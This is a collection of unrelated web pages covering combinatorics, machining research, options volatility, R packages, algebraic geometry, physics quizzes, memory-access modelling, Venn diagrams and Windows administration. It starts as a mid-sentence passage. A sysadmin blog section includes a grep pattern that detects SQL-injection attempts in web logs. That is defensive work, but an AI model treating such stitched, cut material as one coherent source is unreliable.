This means that, when you were picking the last item out, your last item was also in the pool, giving a final term of $(n - k) + 1$. I find the easiest way to get an intuition for something like this is to derive it from first principles. Mathematics only works for real-world problems when there's a relation between the problem and the mathematics, but it goes the other way, too: if some mathematics solves a problem, and you try to solve the problem from scratch, you'll end up doing something equivalent to that mathematics. If your solution is intuitive to you, then that intuition also applies to the mathematics. Ultimately, the solution to a “this is not intuitive” problem is specific to the way you think. That also means such questions probably aren't appropriate for this site; consider asking a teacher instead.
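The counting argument above can also be checked mechanically: the product $n(n-1)\dots(n-k+1)$ has exactly k factors, one per draw, so stopping at $(n-k+1)$ rather than $(n-k)$ is forced by the factor count. A small sketch:

```python
from math import factorial

def ordered_samples(n, k):
    """Number of ways to draw k of n objects in order, without
    replacement: one factor per draw, pool shrinking by 1 each time."""
    if k > n:
        return 0
    count = 1
    for draw in range(k):      # exactly k factors, draw = 0, ..., k-1
        count *= n - draw      # last factor is n - (k - 1) = n - k + 1
    return count

# agrees with the closed form n! / (n - k)!
assert ordered_samples(5, 3) == 5 * 4 * 3 == factorial(5) // factorial(2)
```

The loop makes the fencepost visible: `draw` runs from 0 to k−1, so the final multiplier is n−(k−1), never n−k.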
https://depositonce.tu-berlin.de/items/427c9f70-b23b-48b3-834c-438b19695fcd
# Efficient abrasive water jet milling for near-net-shape fabrication of difficult-to-cut materials

## FG Werkzeugmaschinen und Fertigungstechnik

The utilization of materials with a high strength-to-density ratio enables efficiency improvements and is therefore in demand for many applications, particularly in the aerospace and other mobility sectors. However, the machining of these typically difficult-to-cut materials poses a challenge for conventional manufacturing technologies due to high tool wear. Abrasive water jet (AWJ) machining is a promising alternative manufacturing technology for machining difficult-to-cut materials, since the tool wear is low and material independent. However, AWJ machining is limited regarding the producible geometries when conducting cuts through a material. This limitation can be resolved with AWJ milling operations, which on the other hand are time-consuming. To approach this challenge, an enhanced AWJ milling operation is presented and investigated in this paper with the aim of expanding the producible geometries. This operation consists of two kerfs, inserted from different sides of the workpiece, which intersect at their kerf ground. Consequently, a piece of material is separated without the cut material being entirely chipped. Thus, the operation possesses a high aggregated material removal rate. The investigations presented in this paper show and evaluate the effects that occur during the milling of kerfs with variable depths on titanium aluminide TNM-B1. Furthermore, a method to compensate for these effects is introduced, and thus the producible geometries for effective AWJ milling could be enhanced.
https://financeunlocked.com/equity-option-trading-3-3-vega-and-implied-volatility/
# Equity Option Trading (3/3): Vega and Implied Volatility

#### Executive summary

When there is a significant event on the calendar, such as an election, the forward volatility that can be extracted from the term structure for a time span that captures the event is often elevated. This creates "kinks" in the volatility curve, which traders buy or sell based on their expectations for the amount of volatility the event will generate.

#### Key learning objectives:

• What is Implied Volatility and how is it extracted from market option prices through the Black-Scholes model?
• What is Vega & the term structure of volatility?
• How do we calculate weighted vega?
• What is Forward Volatility?

#### What is Implied Volatility?

The Implied Volatility of an option is the market's expectation of the future realised volatility of the underlying equity up to a given maturity.

#### How do we use the Black-Scholes model to extract implied volatility from market option prices?

The Black-Scholes formula allows us to convert a fair option price, determined from the market by aggregating all buyers and sellers, into an annualised volatility which we call the implied volatility. We can "imply" the volatility because every other input to the model is known; volatility is the only unknown, so we can solve for the value that reproduces the observed option price.

#### What is Vega & the term structure of volatility?

Vega is the shift in option value caused by an increase in implied volatility of 1%, or 1 vol point. You are long Vega if you are long an option. As the implied volatility increases, the time value increases and the option gains in value. If the implied volatility went down to zero, the option would lose all its time value and be worth only its intrinsic value (if it had any). We can trade options of many different expiries, and these different expiries or maturities do not have to be priced on the same implied volatility for any given asset.
We can see that implied volatility has a term structure, similar to a yield curve in interest rates, when we plot vol on the y-axis and maturity on the x-axis. The shape of that term structure can vary depending on market conditions.

#### How do we calculate weighted vega?

Because of the way the variable of time appears in the Black-Scholes model, we infer that the appropriate weighting factor to use is $1/\sqrt{T}$, where $T$ is maturity in years. This is also the market convention and accurately reflects how we observe volatility surface changes on a daily basis.

#### What is Forward Volatility?

It is the implied volatility for a specific period of time in the future between two points on the curve.
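As an illustration of the mechanics described above (this sketch is not from the article — the function names and market inputs are made up), implied volatility can be backed out of a Black-Scholes call price by root-finding, and forward volatility recovered from two points on the term structure via the standard variance-additivity identity:

```python
import math

def norm_cdf(x):
    # Standard normal CDF via the error function
    return 0.5 * (1.0 + math.erf(x / math.sqrt(2.0)))

def bs_call(S, K, T, r, sigma):
    # Black-Scholes fair value of a European call
    d1 = (math.log(S / K) + (r + 0.5 * sigma**2) * T) / (sigma * math.sqrt(T))
    d2 = d1 - sigma * math.sqrt(T)
    return S * norm_cdf(d1) - K * math.exp(-r * T) * norm_cdf(d2)

def implied_vol(price, S, K, T, r, lo=1e-6, hi=5.0):
    # Every input except sigma is known, so bisect on sigma
    # (a call's price is monotone increasing in volatility).
    for _ in range(100):
        mid = 0.5 * (lo + hi)
        if bs_call(S, K, T, r, mid) < price:
            lo = mid
        else:
            hi = mid
    return 0.5 * (lo + hi)

def forward_vol(sigma1, T1, sigma2, T2):
    # Implied vol for the period between T1 and T2 on the curve
    return math.sqrt((sigma2**2 * T2 - sigma1**2 * T1) / (T2 - T1))

# Round-trip: price an at-the-money call at 20 vol, then recover the vol.
px = bs_call(100, 100, 1.0, 0.02, 0.20)
print(round(implied_vol(px, 100, 100, 1.0, 0.02), 4))   # 0.2

# Forward vol between the 1y point (20 vol) and the 2y point (25 vol):
print(round(forward_vol(0.20, 1.0, 0.25, 2.0), 4))
```

An elevated forward vol over an event window is exactly the "kink" described in the executive summary: the 2y leg carries more variance than the 1y leg alone implies.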
https://www.r-bloggers.com/2013/01/safely-loading-packages-in-r/
Using R snippets written by other developers can be unendingly maddening. There are a variety of reasons for this, most of which boil down to a simple issue: most code is written such that a system must be configured in precisely the same way as the code's author's machine. Anyone who's ever seen a line like this:

read.xls("C:/Users/MCaine/code/R/projecteuler/someotherdirectory/data.xls")

knows what I am talking about. To use this without modification, you must:

1. Use Windows.
2. Have exactly the directory structure specified by the address (which is highly unlikely, unless you were the one who wrote it).
3. Have the gdata package installed and included in the project (which is both unlikely, and difficult to know without already being a regular user of the package).

You can see how it would already be easier to just change the address to whatever works on your machine. For this problem, I'm afraid I have no easy solution. My preferred approach is to provide URLs, so that the directory structure doesn't depend on the user's machine, but this obviously brings its own host of problems. However, I can take aim at the third issue.

Package management in R is a silly thing, both because it is so easy and because it is so easy to screw up. Most people who write R write it like analysts: they write exactly enough code to get the desired output on their machine, and leave it at that. When such R code is made public, it tends to be very difficult to use in actual replication. But there are some simple ways around that.

Consider this gist. Instead of calling library(package), which fails if the package is not installed on the user's machine, getPackage(package) invokes the safer require function, which doesn't fail when the local machine doesn't have the requisite package.
Instead, it returns false, which triggers the R script to download the package from the user's default CRAN mirror and then bring it into the user's working session. If anything goes wrong, it throws an error, but it won't do that for anything silly like the user not having a package that is a mere two commands away.

One note: because of the esoteric manner in which R treats package names, you must pass this function a string and not a bare package name. If you're not on top of your type know-how, this means that getPackage(plyr) will fail. You should instead write getPackage("plyr").

Now, I'm sure there's a very good reason hidden deep in R's core that this is a bad way to do things, but it has saved me time and headaches. R is recognized as a difficult language both within the programming world (for its strange inconsistencies and its non-grown-up hacker culture), and outside of it (because programming is hard). I wish that more R functions were written in this defensive way to decrease the cognitive barriers to using R for the latter group.
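The linked gist isn't reproduced in this post, so the following is only a sketch reconstructed from the description above — not the author's exact code:

```r
# Sketch of the getPackage() helper described in the post.
# Reconstructed from the prose, not copied from the gist.
getPackage <- function(pkg) {
  # require() returns FALSE (with a warning) instead of failing
  # when the package is missing on the local machine.
  if (!require(pkg, character.only = TRUE)) {
    # Pull from the user's default CRAN mirror, then load it.
    install.packages(pkg)
    # library() still fails loudly if the install itself went wrong.
    library(pkg, character.only = TRUE)
  }
  invisible(TRUE)
}

# Note the string argument -- getPackage(plyr) would fail:
getPackage("plyr")
```

The `character.only = TRUE` argument is what lets the helper accept a string; it is also why the bare-name form `getPackage(plyr)` does not work.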
https://zbmath.org/?q=an:0585.14008
## Variétés polaires. II: Multiplicités polaires, sections planes et conditions de Whitney. (Polar varieties. II: Polar multiplicities, plane sections and the Whitney conditions). (French) Zbl 0585.14008

Algebraic geometry, Proc. int. Conf., La Rábida/Spain 1981, Lect. Notes Math. 961, 314-491 (1982).

[For the entire collection see Zbl 0487.00004. For part I see Inst. Élie Cartan, Univ. Nancy I 3, 33-55 (1981; Zbl 0572.14002).]

Let $(X,x)$ be a germ of a reduced analytic space of (pure) dimension $d$. A collection of $d$ natural numbers (polar multiplicities) $M^*_{X,x}=\{m_x(X),\, m_x(P_1(X)),\ldots, m_x(P_{d-1}(X))\}$ corresponds to it. Here $P_k(X)$ is the (local) polar variety in general position of codimension $k$ for the germ $X$, and $m_x$ the multiplicity at the point $x$. The local polar variety $P_k(X)$ of codimension $k$ can be defined in the following way. Let $(X,x)\to (\mathbb{C}^N,0)$ be an imbedding of the germ $(X,x)$ into a complex linear space, and let $p\colon (\mathbb{C}^N,0)\to (\mathbb{C}^{d-k+1},0)$ be the projection along a subspace $L$ in general position of dimension $N-d+k-1$. The polar variety $P_k(X)$ is the closure in $X$ of the set of critical points of the restriction of the projection $p$ to the set $X^0$ of non-singular points of the germ $X$. It is either empty or an analytic subspace of pure codimension $k$ in $X$. Its multiplicity at the point $x$ is denoted by $m_x(P_k(X))$. It does not depend on the space $L$ along which the projection is realized, provided $L$ is chosen in general position. We have $X=P_0(X)$, i.e., $m_x(X)=m_x(P_0(X))$.

Main result of the paper under review: Theorem: Let $X$ be a reduced complex-analytic space of pure dimension $d$, let $Y$ be a non-singular analytic subspace of $X$, and $0\in Y$. The following conditions are equivalent: (1) the pair $(X^0,Y)$ satisfies the Whitney conditions (a), (b) at $0$ ($X^0$ is the set of non-singular points of the space $X$); (2) the collection of polar multiplicities $M^*_{X,y}$ is constant for all $y\in Y$ in a neighbourhood of the point $0$. Thus, the pair $(X^0,Y)$ fails the Whitney conditions at the point $0$ if and only if the multiplicity of one of the local polar varieties $P_k(X)$ in general position is not constant in a neighbourhood of $0$ on $Y$. The significance of this result lies in the fact that the collections of polar multiplicities $M^*_{X,x}$ can (in a certain sense) be computed by topological methods, whereas directly checking the Whitney conditions requires analytic computations.

### MSC:

14B05 Singularities in algebraic geometry
13H15 Multiplicity theory and related topics
32Sxx Complex singularities

### Citations:

Zbl 0487.00004; Zbl 0572.14002
http://clay6.com/qa/14627/in-moseley-s-law-sqrt-v-a-z-b-the-values-of-the-screening-constant-for-k-se
# In Moseley's law $\sqrt{\nu}=a(Z-b)$, the values of the screening constant $b$ for the K-series and L-series of X-rays are respectively

$\begin{array}{ll} (1)\;1,\,6.4 & \quad (2)\;1,\,4 \\ (3)\;4,\,6 & \quad (4)\;2,\,4 \end{array}$

Answer: (1) 1, 6.4
http://www.cs.iit.edu/~scs/home/C-AMAT/c-amat-3.html
Concurrent-AMAT: a mathematical model for Big Data access

May 12, 2014

Fig. 1 provides a demonstration example to illustrate the "pure miss" and hit cycle concepts. It contains five different memory accesses, and each access takes 3 cycles for cache hit operations. On a miss, additional miss penalty cycles are required, and the number of miss penalty cycles is uncertain. Accesses 1, 2, and 5 are hits; Accesses 3 and 4 are misses. Access 3 has a 3-cycle miss penalty; Access 4 has only a 1-cycle miss penalty. When considering access concurrency, only Access 3 contains 2 pure miss cycles. Though Access 4 has 1 miss cycle, that cycle is not a pure miss cycle, because it overlaps with the hit cycles of Access 5. Therefore, the (pure) miss rate of the five accesses is 0.2, according to our new definition of concurrent (pure) miss rate, instead of 0.4 for the conventional non-concurrent version. Misses whose cycles overlap with hit accesses are bypassed because such misses do not stall the processor; the processor can continue with the hit accesses. According to Eq. 2, C-AMAT is 8 cycles over 5 accesses, or 1.6 cycles per access; whereas by Eq. 1, AMAT is 3 + 0.4 × 2, or 3.8 cycles per access. The difference between C-AMAT and AMAT is the contribution of concurrent data access. In this example, concurrency has doubled memory performance.

Fig. 1 - A C-AMAT Example.

Fig. 2 shows the detecting structure of C-AMAT. The Hit Concurrency Detector (HCD) counts the total hit cycles and records each hit phase in order to calculate the average hit concurrency. The HCD also tells the Miss Concurrency Detector (MCD) whether the current cycle has a hit access or not.
The MCD is a monitor unit that counts the total number of pure miss cycles and records each pure miss phase in order to calculate the average miss concurrency, pure miss rate, and pure miss penalty. With the information provided by the HCD, the MCD is able to tell whether a cycle is a pure miss cycle, and whether a miss is a pure miss. With the miss information, the pure miss rate and average pure miss penalty can be calculated. These parameters can be measured at each layer of a memory hierarchy; therefore, C-AMAT can also be measured at each layer of a memory hierarchy.

Fig. 2 - C-AMAT Detecting Structure.

Please notice that the contribution of C-AMAT is not its measurement. The measurement can be obtained directly through APC [6], and does not depend on measuring its five parameters. The value of the parameters is in performance analysis and optimization. The indispensable contribution of C-AMAT is that it gives a unified formulation to capture the joint performance impact of locality and concurrency. C-AMAT contains AMAT as a special case where memory concurrency does not exist, and provides a means to evaluate and optimize the five performance parameters, individually or in combination. It provides a tool for design optimization.

Readers who are familiar with AMAT may recall that the average miss penalty of AMAT can be extended recursively to the next layer of a memory hierarchy. This recursiveness is true for C-AMAT as well. Eq. 3 shows the recurrence relation of C-AMAT1 and C-AMAT2, that is, extending C-AMAT from the L1 level to the L2 level. Please notice that we have introduced a new parameter, η1, and the impact of C-AMAT2 toward the final C-AMAT1 has been trimmed by pMR1 and η1. pMR1 × η1 is the concurrency contribution in reducing average memory (access) delay at the L1 level. η1 only has one new parameter, Cm, which is the miss concurrency.
Please notice that we use CM (capital M) to represent pure concurrent misses and Cm (little m) to represent concurrent misses. η1 is a measurable parameter and has physical meaning: the number of misses occurring on L2 is Cm, and the number of misses that matters to L1 performance is CM. A similar argument applies to pAMP and AMP. In the same fashion as Eq. 3, C-AMAT can be extended to the next layer of the memory hierarchy.

Eq. 3 – $C{\text{-}}AMAT_{1} = \frac{H_{1}}{C_{H_{1}}} + pMR_{1} \times \eta_{1} \times C{\text{-}}AMAT_{2}$

where $C{\text{-}}AMAT_{1} = \frac{H_{1}}{C_{H_{1}}} + pMR_{1} \times \frac{pAMP_{1}}{C_{M_{1}}}$ , $C{\text{-}}AMAT_{2} = \frac{H_{2}}{C_{H_{2}}} + pMR_{2} \times \frac{pAMP_{2}}{C_{M_{2}}}$ , and $\eta_{1} = \frac{pAMP_{1}}{AMP_{1}} \times \frac{C_{m_{1}}}{C_{M_{1}}}$.

APC is a performance metric whose value is the inverse of C-AMAT [1]. The correctness and measurement of APC are well studied in [6]; therefore, the correctness of the measurement of C-AMAT is guaranteed. At first look, APC (Access Per Cycle) seems very similar to the well-known metric IPC (Instruction Per Cycle). But, in fact, the cycle used in APC is completely different from the cycle used in IPC: they differ in definition and in measurement. In APC, the cycles are memory active cycles, not CPU cycles as used in IPC, so APC can also be read as APMAC (Access Per Memory Active Cycle). Also, APC uses the overlapping mode to count memory access cycles; that is, if two or more data accesses occur in the same cycle, the cycle count only increases by one. These two differences between APC and IPC are crucial. The replacement of CPU cycles with memory active cycles separates the APC measurement from CPU performance. The separation makes it possible to apply APC at each level of a multi-level hierarchical memory system, and leads to a better understanding of the matching between computing systems and memory systems.
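As a quick numeric sketch (not from the article), the Fig. 1 numbers can be plugged into Eq. 1 and the overlapped-cycle definition of C-AMAT; the function names here are made up for illustration:

```python
# Numeric check of the Fig. 1 example against Eq. 1 (AMAT) and the
# overlapped-cycle definition of C-AMAT described in the text.

def amat(hit_time, miss_rate, avg_miss_penalty):
    # Eq. 1: AMAT = HitTime + MR x AMP (non-concurrent view)
    return hit_time + miss_rate * avg_miss_penalty

def c_amat(memory_active_cycles, accesses):
    # C-AMAT counts cycles in overlapping mode: a cycle with several
    # accesses in flight is counted once, then averaged per access.
    return memory_active_cycles / accesses

# Fig. 1: five accesses, 3 hit cycles each; two misses with penalties of
# 3 and 1 cycles, so the conventional miss rate is 0.4 and the average
# miss penalty is (3 + 1) / 2 = 2.
print(round(amat(3, 0.4, 2), 1))   # 3.8 cycles per access

# With overlap, the five accesses occupy only 8 memory active cycles:
print(c_amat(8, 5))                # 1.6 cycles per access
```

The 3.8 vs. 1.6 gap is exactly the "contribution of concurrent data access" the example describes: concurrency doubles memory performance here.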
This replacement represents the shift from traditional compute-centric thinking to data-centric thinking in studying memory systems. Overlapping is the concept of parallel data access, and overlapping cycles are a measurement of parallel data accesses. C-AMAT introduces the concept of parallel memory systems and provides a tool for evaluating and designing them. C-AMAT has opened a new door to computer hardware development and algorithm design.

C-AMAT is a model calling for a rethinking of memory and computing system design. It is simple and effective. It has a unified mathematical expression considering both data locality and concurrency, and is based on a rigorous analytical and mathematical proof. C-AMAT makes the contribution of concurrent data accesses toward overall system performance measurable, and therefore provides a means to optimize concurrent data accesses. It calls for a rethinking of the design of computer architectures and algorithms to consider memory concurrency and the interaction between memory concurrency and locality. C-AMAT will make a noticeable impact on the next generation of computers and their associated software development and algorithm design.

[Acknowledgement] C-AMAT is a joint work of Dr. Dawei Wang and the author, and the application of C-AMAT is a joint work of Dr. Yuhang Liu and the author. Dr. Yuhang Liu provided valuable help in writing this article.

Dr. Xian-He Sun is a distinguished professor of Computer Science and the Chairman of the Department of Computer Science at Illinois Institute of Technology (IIT). He is an IEEE fellow, a guest faculty in the Mathematics and Computer Science Division at Argonne National Laboratory, and the director of the Scalable Computing Software laboratory at IIT.
He is an editor of eight international professional journals, and has served and is serving as the chairman or a member of the program committee for numerous international conferences and workshops. His current research interests include parallel and distributed processing, memory and I/O systems, software systems for Big Data applications, and performance evaluation and optimization. He has published over two hundred research articles in the field of computer science and communication. Based on Google Scholar, his works have been referenced 2,694 times during the last five years since 2009 (1/16/2014 data).
http://mathhelpforum.com/statistics/166025-venn-diagrams.html
1. ## Venn Diagrams

Q) Create a Venn diagram using this information: P(A)=0.4, P(B)=0.2, P(AnC)=0.04, P(BuC)=0.44, B & C are independent and A & B are mutually exclusive.

If possible, could someone please draw the Venn diagram with an explanation? The main trouble I'm having is where to use the fact that B & C are independent. Thanks.

2. $P(B\cap C) = P(B)P(C)=.2P(C)$ (by independence)

$P(B\cup C) = P(B)+P(C)-P(B\cap C)$

$.44= .2+P(C)-.2P(C)$

$.44= .2+.8P(C)$

$.24= .8P(C)$

$P(C)=.3$

3. Hello, wahhdoe!

$\text{Create a Venn diagram using this information:}$
$P(A)=0.4,\;P(B)=0.2,\;P(A \cap C)=0.04,\;P(B \cup C)=0.44$
$B\text{ and }C\text{ are independent, and }A\text{ and }B\text{ are mutually exclusive.}$

DrSteve did an excellent job! He found that: $P(C) = 0.3$

Since $B$ and $C$ are independent:

$P(B \cap C) \:=\: P(B)\cdot P(C) \:=\:(0.2)(0.3) \:=\:0.06$

The Venn diagram looks like this:

Code:
    *-----------------------------------------------*
    |                                               |
    |   *---------------*       *---------------*   |
    |   | A             |       | B             |   |
    |   |     0.36      |       |     0.14      |   |
    |   |               |       |               |   |
    |   |       *-------+-------+-------*       |   |
    |   |       | 0.04  |       | 0.06  |       |   |
    |   |       |       |       |       |       |   |
    |   *-------+-------*       *-------+-------*   |
    |           |          0.2          |           |
    |           |   C                   |           |
    |           *-----------------------*           |
    |                                       0.2     |
    *-----------------------------------------------*
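As a quick check (not part of the original thread), the numbers above can be re-derived in a few lines; only the probabilities given in the question are assumed:

```python
# Re-deriving the thread's answer from the given data.
P_A, P_B = 0.4, 0.2
P_AiC = 0.04          # P(A n C), given
P_BuC = 0.44          # P(B u C), given

# Inclusion-exclusion plus independence of B and C:
#   0.44 = 0.2 + P(C) - 0.2*P(C)  =>  P(C) = 0.24 / 0.8
P_C = (P_BuC - P_B) / (1 - P_B)
P_BiC = P_B * P_C     # independence: P(B n C) = P(B) * P(C)

# Region values for the diagram (A and B are mutually exclusive,
# so A n B and A n B n C are empty):
A_only = P_A - P_AiC
B_only = P_B - P_BiC
C_only = P_C - P_AiC - P_BiC
outside = 1 - (A_only + B_only + P_AiC + P_BiC + C_only)

print(round(P_C, 2), round(P_BiC, 2))      # 0.3 0.06
print(round(A_only, 2), round(B_only, 2),
      round(C_only, 2), round(outside, 2)) # 0.36 0.14 0.2 0.2
```

The six region values sum to 1, which is a useful sanity check on any finished Venn diagram.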
http://www.daknetworks.com/index.php/blog
daknetworks.com

Examine httpd access logs

I spend a large amount of time defending from spam attacks and SQL injection attacks. I can analyze the httpd logs with the following:

grep schem ./access_log* | cut -d ' ' -f 2 | sort | uniq -c | sort -n

• The 'grep' command searches for the word schema, as in information_schema. No real SQL query searches for this; it is always an SQL hacking attempt.
• The files we are searching are 'access_log*', which means search through all the access logs that we have. For me, that is usually around 4 months of data — a fairly good data set.
• The 'cut' command chunks up the data. The '-d' part tells how to chunk the data: by a space character. The '-f 2' tells what data to collect: the second item in each line.
• The 'sort' groups identical items together; this matters because 'uniq -c' only counts adjacent duplicate lines.
• The 'uniq -c' counts each unique item.
• The final 'sort -n' sorts them least to greatest.

WSUS Setup

I give credit when credit is due. This has been covered very well in the following video:

Export Contacts from Exchange 2013

Export contacts from a mailbox in Exchange 2013, for an OU.

apcupsd

apcupsd manages APC UPSes. It's rather simple:

RUN APCUPSD

Running apcupsd isn't hard:

• -click START > PROGRAMS > APCUPSD > START-APCUPSD

This will shut your computer down when the battery is nearing the end of its power.

TEST BATTERY WITH APCUPSD

One of my favorite parts is that apcupsd has some options to test a battery and set some battery options. Here's how:

• -first, stop apcupsd by: click START > PROGRAMS > APCUPSD > STOP-APCUPSD
• -you may have to stop the APCUPSD service: click START > RUN > SERVICES.MSC. Find APCUPSD in the list. Click STOP.
• -cd to: C:\apcupsd\bin
• -type apcaccess.exe to see stats
• -type apctest.exe to test/configure battery

PERFORM CALIBRATION

Most of the trouble comes from performing calibration on the unit. This can be done in 2 different ways:

• -with APCTEST.
• -with a manual calibration.

A manual calibration is basically to put at least a 30% load on the unit.
Unplug the unit and let it drain to zero. Plug the unit back in.

NOTES:
-you cannot run apctest.exe with apcupsd running.
-click here for the manual calibration docs, as they get into more detail than I care to display: http://www.apcupsd.com/manual/manual.html#manual-runtime-calibration

FileMaker on a cloud Virtual Machine

I've had an interest in FileMaker for decades. Nothing else seems to fit the custom software solution like FMP does. So putting the FMP Server on a cloud VM was information worth pursuing. The costs from various places range like this (obscured to avoid any love letters):

SOURCE    MONTHLY-COST    TOTAL-COST
aws       50              600
lsn       50              600
host-1    71              852
host-2    79              948
host-3    99              1188
host-4    100             1200
host-5    130             1560
host-6    130             1560
host-7    140             1680
host-8    150             1800
host-9    150             1800

As the outgoing Rackspace CEO recently referenced, it is hard to beat a disrupter like AWS. You're going to have to join them. In the end, I decided to go with LSN. They have a CloudStack running and I can rely on their support if I'm ever in a jam.

NOTES: http://www.soliantconsulting.com/blog/2016/01/filemaker-server-on-amazon-web-services

The Quick and Dirty Windows 10 Fix

1- fix Windows Update
Use the Windows Update Troubleshooter here: https://support.microsoft.com/en-us/help/10164/fix-windows-update-errors

2- fix Windows Image
-type: DISM.exe /Online /Cleanup-image /Restorehealth

3- fix Windows System File
-type: sfc /scannow

4- fix Windows Apps
-type: Get-AppXPackage | Foreach {Add-AppxPackage -DisableDevelopmentMode -Register "$($_.InstallLocation)\AppXManifest.xml"}

Exchange 2013 Error: The Global Catalog Verification failed

Working on Exchange 2013 and adding permissions to a mailbox, I get:

Active Directory operation failed on exchange.domain.tld. This error could have been caused by user input or by the Active Directory server being unavailable. Additional information: The global catalog verification failed. The global catalog is not available or does not support the operation.
Some part of the directory is currently not available. Active directory response: 000020E1: SvcErr: DSID-03200672, problem 5002 (UNAVAILABLE), data 0

Here's how to fix:

• -delete the files in: C:\Users\administrator\AppData\Roaming\Microsoft\MMC
• -re-run the command: Add-MailboxPermission foo.user -User foo.user2 -AccessRights FullAccess -InheritanceType All
• set-mailbox foo.user -GrantSendOnBehalfTo foo.user1,foo.user2,foo.user3

That is all.

The Trust Relationship Between This Workstation and the Primary Domain Has Failed

Just as a USER-ACCOUNT is an object in AD, a COMPUTER-ACCOUNT is an object in AD. It has a password, but the password isn't working. Let's reset the password.

• $credential = Get-Credential (enter the domain admin account when prompted)
• -type: Reset-ComputerMachinePassword -Server ClosestDomainControllerNameHere -Credential $credential

Test-ComputerSecureChannel

Now, let's test the secure channel:

• -start > programs > powershell (as administrator)
• -type: Test-ComputerSecureChannel

It will come back either TRUE or FALSE. If it's false, let's try and repair it.

• -type: Test-ComputerSecureChannel -Repair
• -if that didn't work, try: Test-ComputerSecureChannel -Repair -Credential $credential

Netdom

An older way of fixing this was with NETDOM.

I found out the relationship failed by:

• -right-click a folder that is a shared folder for a group on the domain.
• -click properties
• -click security tab (at the top)
• -click advanced button (at the bottom)
• -effective-access tab
• -select a user
• -click VIEW-EFFECTIVE-ACCESS

ForensiT User Profile Wizard For Entire Location

ForensiT User Profile Wizard is a great tool when you are migrating from domainold.tld to domainnew.tld. The free version is a manual process, but the corporate version is an automated process that helped migrate an entire office.

Cost

The cost is around $2 USD per computer. So for 100 computers, the cost is $200.
Priced correctly on the time you will save.
Installation
A license file will be emailed to you. Save the file in the location: C:\ProgramData\ForensiT\User Profile Wizard Corporate\Deployment Files\
Run The Wizard
Running the wizard will create a CONFIG file. The config file is an xml file that is editable by any text editor. The options are pretty standard. You will be able to get through them. Very simple, nothing complex. I think the only gotchas are:
-reboot without notice (as you'll be doing this off-hours).
-create a SINGLE-DEPLOYMENT-FILE.
When finished, it will save the CONFIG file in: C:\ProgramData\ForensiT\User Profile Wizard Corporate\Deployment Files\
Edit the Config File
Edit the CONFIG file at C:\ProgramData\ForensiT\User Profile Wizard Corporate\Deployment Files\. Run the PROFWIZ.EXE again to edit the file you just created. You need to edit a few items to get it to work the way we want it to. Namely, the following:
<!-- Corporate Edition Settings -->
<Silent>True</Silent>
<NoMigrate>False</NoMigrate>
<NoReboot>False</NoReboot>
<MachineLookupFile>\\server\share\migrate-pc-file.csv</MachineLookupFile>
<Log>\\server\share\Migrate.Log</Log>
<ScriptLocation>\\server\share\Migrate.vbs</ScriptLocation> (yes, change this even if it says not to. I find having the server share is more accommodating)
<!-- Settings for migrating all profiles -->
<All>True</All>
<!-- Advanced Settings -->
<Persist>False</Persist>
<NoGUI>True</NoGUI>
<ProtocolPriority>LDAP</ProtocolPriority>
<DC>\\britannic2.britannic.domainname.tld</DC>
<ProfBatRetryLimit>3</ProfBatRetryLimit>
<ProfBatRetryDelay>2</ProfBatRetryDelay>
Most of the key/values are self-explanatory. To choose which domain controller you want to join, the ProtocolPriority must be set to LDAP and the DC setting specifies the FQDN of the domain controller (make sure you precede it with "\\").
Create Migrate-PC.CSV File
A .csv file needs to be created. Column A is the current computer name. Column B is the new computer name. If the names are the same then the computer name doesn't change.
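The lookup file described above is plain CSV, so it can be generated from a machine list instead of being typed by hand. A minimal PowerShell sketch (the $machines entries and the share path are example values of my own, not from ForensiT's documentation):

```powershell
# Hypothetical machine list: old name -> new name (same name = no rename).
$machines = @(
    @{ Old = "PC-001";     New = "PC-001" },
    @{ Old = "PC-OLDNAME"; New = "PC-NEWNAME" }
)

# Build the two-column CSV that <MachineLookupFile> points to.
$machines |
    ForEach-Object { "$($_.Old),$($_.New)" } |
    Set-Content "\\server\share\migrate-pc-file.csv"
```

The same list could come from Get-ADComputer or a PDQ Inventory export if you already track the machines elsewhere.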
Save this file in \\server\share\migrate-pc-file.csv
Save the single-deployment-file in the same location: \\server\share
Deployment
I used several ways to deploy.
1- batch from the admin workstation:
• -save it in: C:\ProgramData\ForensiT\User Profile Wizard Corporate\Deployment Files\
• -make sure you are still on the domainold.tld and logged in as a user at domainold.tld
• -reboot all the computers for a fresh start (use PDQ Inventory if you need to do this automatically).
• -click START > PROGRAM-FILES > FORENSIT > COMMAND-LINE (you do not need to run this as-admin)
• -a cmd prompt opens
• -you should be at: C:\ProgramData\ForensiT\User Profile Wizard Corporate\Deployment Files\
• -type: profbat.exe
• -hit enter
• -wait... It will give some feedback but not much.
• -it will automatically go through all the computers in the .csv list, migrate all the profiles, join the new domain and reboot the computers.
• -once rebooted, everyone can use their new login at newdomain.tld
• -AWESOME!
• -the logs should be at \\server\share
• -each pc will have its own migration log.
2- manually at the admin workstation:
• -click START > PROGRAM-FILES > FORENSIT > COMMAND-LINE (you do not need to run this as-admin)
• -a cmd prompt opens
• -type: profwiz.exe /COMPUTER computer-name-here
• -hit enter
• -you will see: >
• -wait... It won't give any verbose information.
• -soon it will go to a new line once finished and you will see: > >
• -the logs are in the place you indicated (which should be \\server\share\).
3- manually at admin workstation after domainnew.tld
If for some reason, the pc's are joined to the domainnew.tld without the profiles being migrated, don't worry as it is pretty much the same process. The most important part is the first step:
• -make sure you are on the domainnew.tld and logged into a user with domainnew.tld
• -click START > PROGRAM-FILES > FORENSIT > COMMAND-LINE (you do not need to run this as-admin)
• -a cmd prompt opens
• -type: profwiz.exe /COMPUTER computer-name-here
• -hit enter
• -you will see: >
• -wait...
It won't give any verbose information.
• -soon it will go to a new line once finished and you will see: > >
• -the logs are in the place you indicated (which should be \\server\share\).
4- manually at the client computer:
• -save the profwiz.exe, profwiz.config, migrate.exe, migrate.vbs at the share: \\server\share\
• -edit the profwiz.config
• -change: <GUI> True
• -save
• -run: migrate.vbs
• -it should show the progress and migrate all the profiles over.
• -reboot the computer.
5- automatically via logonscript
• -save the profwiz.exe, profwiz.config, migrate.exe, migrate.vbs at the share: \\server\share\
• -login to the client pc. It will begin the migration process and skip it if it has already been run (of course it won't be referenced once the computer is joined to the new domain).
Final Thoughts
That's it! That should handle all the scenarios that will work. Of course, there are many scenarios that will NOT work. Most of the errors will be trying to move a client-pc on domainold.tld by using an admin-workstation already joined to domainnew.tld (and logged into a domainnew.tld user). Or vice-versa. If you are making changes, the client-pc and the admin-pc must be on the same domain (at least for it to be easy). In any event, in all scenarios I did not visit a single client pc. Everything worked with a little thinking. This should be built into Windows Server.
NOTES:
